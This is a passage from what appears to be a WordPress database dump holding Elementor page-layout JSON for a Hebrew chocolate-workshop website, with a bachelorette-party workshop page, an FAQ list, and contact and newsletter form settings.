\\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"374c003\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37447efb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"60d0c953\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"7dfe3d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"11596977\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53b6941c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6eef024e\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1009,206,'_wp_page_template','default'),(1010,206,'_elementor_edit_mode','builder'),(1011,206,'_elementor_template_type','post'),(1012,206,'_elementor_data','[{\"id\":\"5ae558de\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"76867a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"6b7a424b\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29eb19f8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"859196c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"72d55618\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"407e28c0\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"415b3ee2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6383ac34\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55e4ccad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cc23117\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"65d5b2bb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3453d936\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2e2fb1ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"489f7aa8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"1507f0f7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25c3fc17\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b29f897\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"12851db1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28303ac7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"725a935c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"47ca8a3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3924078b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1038fd3f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"1